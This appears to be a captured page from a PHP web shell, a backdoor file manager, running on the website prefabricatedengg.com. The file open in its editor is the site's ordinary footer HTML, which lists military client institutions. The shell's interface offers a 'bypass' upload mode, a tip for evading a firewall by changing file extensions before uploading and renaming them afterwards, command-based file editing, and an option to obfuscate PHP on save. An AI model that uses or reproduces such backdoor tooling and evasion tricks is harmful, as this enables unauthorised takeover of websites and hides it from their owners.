Search
Search
Search
Search
Information
Information
Light
Dark
Open actions menu
Basic upload method
Bypass upload method
Tips!
If you encounter an error (by firewall) while uploading using both methods,
try changing extension of the file before uploading it and rename it right after.
This uploader supports multiple file upload.
Submit
~
home
sofftech
prefabricatedengg.com
File Name:
<!-- Clients Marquee Slider --> <section> <div class="marquee-slider"> <div class="marquee-track"> <!-- Client Cards --> <div class="card shadow border-0 mx-3" style="width: 220px; flex: 0 0 auto;"> <div class="card-body text-center"> <h3 class="mb-0"> Army War College, Mhow</h3> </div> </div> <div class="card shadow border-0 mx-3" style="width: 220px; flex: 0 0 auto;"> <div class="card-body text-center"> <h3 class="mb-0"> Army Air Defence College, Gopalpur (twice)</h3> </div> </div> <div class="card shadow border-0 mx-3" style="width: 220px; flex: 0 0 auto;"> <div class="card-body text-center"> <h3 class="mb-0"> Madras Regiment Centre, Wellington</h3> </div> </div> <div class="card shadow border-0 mx-3" style="width: 220px; flex: 0 0 auto;"> <div class="card-body text-center"> <h3 class="mb-0"> 2 Madras Regiment, Binagudi</h3> </div> </div> <div class="card shadow border-0 mx-3" style="width: 220px; flex: 0 0 auto;"> <div class="card-body text-center"> <h3 class="mb-0"> NDA, Dehradun</h3> </div> </div> <div class="card shadow border-0 mx-3" style="width: 220px; flex: 0 0 auto;"> <div class="card-body text-center"> <h3 class="mb-0"> 12 EW Bn</h3> </div> </div> <div class="card shadow border-0 mx-3" style="width: 220px; flex: 0 0 auto;"> <div class="card-body text-center"> <h3 class="mb-0"> 11 Para</h3> </div> </div> <div class="card shadow border-0 mx-3" style="width: 220px; flex: 0 0 auto;"> <div class="card-body text-center"> <h3 class="mb-0"> 16 EW Bn </h3> </div> </div> </div> </div> </section> <style> /* Marquee Slider CSS */ .marquee-slider { overflow: hidden; position: relative; width: 100%; padding: 20px 0; background: #ffffff; } .marquee-track { display: flex; gap: 20px; width: max-content; animation: scrollLeft 30s linear infinite; } .marquee-slider:hover .marquee-track { animation-play-state: paused; /* Pause on hover */ } @keyframes scrollLeft { 0% { transform: translateX(0); } 100% { transform: translateX(-50%); } } /* Card styling */ .card { border-radius: 12px; } .card img { border-top-left-radius: 12px; border-top-right-radius: 12px; } </style> <footer> <div class="container"> <div class="row"> <div class="col-md-12"> <div class="inner-content"> <p> Copyright © <span id="year"></span> Pre Fabricated Sand Model </p> </div> </div> </div> </div> </footer> <script> // Automatically sets the current year document.getElementById('year').textContent = new Date().getFullYear(); </script> <!-- Bootstrap core JavaScript --> <script src="vendor/jquery/jquery.min.js"></script> <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script> <!-- Additional Scripts --> <script src="assets/js/custom.js"></script> <script src="assets/js/owl.js"></script> <script src="assets/js/slick.js"></script> <script src="assets/js/isotope.js"></script> <script src="assets/js/accordions.js"></script> <script language = "text/Javascript"> cleared[0] = cleared[1] = cleared[2] = 0; //set a cleared flag for each field function clearField(t){ //declaring the array outside of the if(! cleared[t.id]){ // function makes it static and global cleared[t.id] = 1; // you could use true and false, but that's more typing t.value=''; // with more chance of typos t.style.color='#fff'; } } </script> <script> $('.owl-deals').owlCarousel({ loop: true, margin: 15, nav: true, dots: false, autoplay: true, autoplayTimeout: 3000, autoplayHoverPause: true, responsive: { 0: { items: 1 }, 576: { items: 2 }, 768: { items: 3 }, 992: { items: 4 }, 1200: { items: 5 } } }); </script> </body> </html>
Bypass Options
Select edit method
Using basic write file
Using command
Info
Info!
If the strings too long, it will be failed to edit file (command method only).
Obfuscate PHP:
No Obfuscate
Obfuscate
Save Changes